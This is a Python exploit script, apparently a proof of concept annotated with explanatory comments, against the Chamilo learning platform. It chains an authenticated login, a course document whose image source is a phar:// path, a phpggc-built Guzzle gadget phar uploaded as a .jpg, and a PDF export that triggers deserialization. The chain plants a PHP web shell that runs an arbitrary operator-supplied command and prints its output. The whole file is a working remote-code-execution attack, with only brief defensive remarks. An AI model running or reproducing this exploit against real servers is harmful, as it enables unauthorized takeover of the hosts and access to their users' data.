import string
import random
import requests
import sys
import os
import re
#proxy = { "http" : "http://127.0.0.1:8080", "https" :"https://127.0.0.1:8080"}
# A single Session so cookies obtained by login() are carried on every later request.
s = requests.Session()
# Positional CLI arguments, read without validation: a missing argument raises IndexError,
# and no argument is checked for shape (e.g. url is used by plain string concatenation below).
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
course_name = sys.argv[4]
command = sys.argv[5]
letters = string.ascii_uppercase
# Two 6-letter names built from random (not secrets); they only serve to avoid name collisions.
rnd_string1 =''.join(random.choice(letters) for i in range(6))
rnd_string2 =''.join(random.choice(letters) for i in range(6))
# Document body: an <img> whose src is a phar:// URI pointing into the course's document directory.
# Defensive note: a phar:// (or other non-http) stream wrapper inside stored user content is a
# reliable detection signal; the server-side mitigation is to refuse the phar wrapper before any
# file function resolves a path that was derived from user-supplied HTML.
payload = '<img alt="" src="phar:///var/www/html/chamilo/app/courses/{}/document/{}.jpg" />'.format(course_name,rnd_string1)
def login():
    """Authenticate the shared session against index.php with the CLI-supplied credentials.

    The response is discarded, so a failed login is not detected here; later
    requests simply run unauthenticated.
    """
    data_login = {'login': username, 'password': password, 'submitAuth': '', '_qf__formLogin':''}
    s.post(url+"index.php", data=data_login)
def create_document():
    """Create a course document titled rnd_string2 whose HTML content is `payload`.

    The course is selected through the cidReq query parameter. The response is
    not inspected, so a rejected or failed creation is silent.
    """
    data_create_document = {"title":"{}".format(rnd_string2),"content":payload,"urdirpath":"%2F","submit":"","_qf__create_document":"","id":0,"title_edited":"false","dirValue":""}
    s.post(url+"main/document/create_document.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&dir=%2F&selectcat=".format(course_name), data=data_create_document)
def trigger_deserialization():
    """Fetch the course document listing and request a PDF export for every document it links.

    The function name indicates that the export step is where the server is
    expected to process the stored HTML (and hence the phar:// image source);
    nothing in this function verifies that, and every export_to_pdf link is
    requested, not only the one for the document created by create_document().
    """
    r = s.get(url+"main/document/document.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&id=0".format(course_name))
    # Every href value on the listing page, in document order.
    links = re.findall("href=[\"\'](.*?)[\"\']", r.text)
    for i in links :
        if "export_to_pdf" in i :
            # Slice the document id out of the href. The +28 offset presumably skips
            # `action=export_to_pdf&amp;id=` (28 chars, HTML-escaped ampersand) — confirm
            # against the real markup; a different encoding would yield a wrong id.
            # NOTE: `id` shadows the builtin of the same name.
            id = i[i.find("action=export_to_pdf&")+28:i.find("&curdirpat")]
            s.get(url+"main/document/document.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&action=export_to_pdf&id={}&curdirpath=%2F".format(course_name,id))
def upload_phar():
    """Upload the local file '<rnd_string1>.jpg' (written by create_pahr()) via document.ajax.php.

    The file handle is opened inline and never closed explicitly; it is only
    released when the `files` dict is garbage-collected. The response is not
    checked.

    Defensive note: the upload is accepted on the strength of a .jpg name; an
    upload handler that validates content (magic bytes, not extension or
    Content-Type) and stores uploads where server-side file functions cannot be
    pointed at them removes this step.
    """
    files = {'files[]': open('{}.jpg'.format(rnd_string1),'rb')}
    s.post(url + 'main/inc/ajax/document.ajax.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&a=upload_file&curdirpath=/'.format(course_name),files=files)
def create_pahr():
    """Write a one-line PHP file to ./shell and package it with the external phpggc tool into '<rnd_string1>.jpg'.

    Requires an executable ./phpggc in the current working directory. `command`
    is interpolated unescaped into both the PHP backtick string and the
    os.system() shell line, so any shell metacharacters it contains are
    interpreted twice. The exit status of os.system() is ignored, so a missing
    or failing phpggc is not detected and upload_phar() will later fail on the
    absent file. (Function name has a typo, kept because it is called below.)
    """
    with open('shell', 'w') as F:
        F.write("<?php echo `{}` ;?>".format(command))
    os.system("./phpggc -p phar Guzzle/FW1 /var/www/html/chamilo/shell.php shell -o {}.jpg".format(rnd_string1))
def shell():
    """Request shell.php on the target and print its body with a fixed JSON wrapper stripped.

    The two replace() calls remove the literal prefix '[{"Expires":1,"Discard":false,"Value":"'
    and suffix '"}]'; this assumes the output is embedded in exactly that
    one-element JSON list — if the response differs, the text is printed as-is.
    """
    r = s.get(url+"shell.php")
    print(r.text.replace('[{"Expires":1,"Discard":false,"Value":"','').replace('"}]',''))
# Runs the whole chain at import time (no __main__ guard). Order matters:
# create_pahr() must precede upload_phar(), which opens the file create_pahr() writes,
# and upload_phar() must precede trigger_deserialization(), whose request is expected
# to resolve the uploaded file. No step checks the previous one succeeded.
login()
create_document()
create_pahr()
upload_phar()
trigger_deserialization()
shell()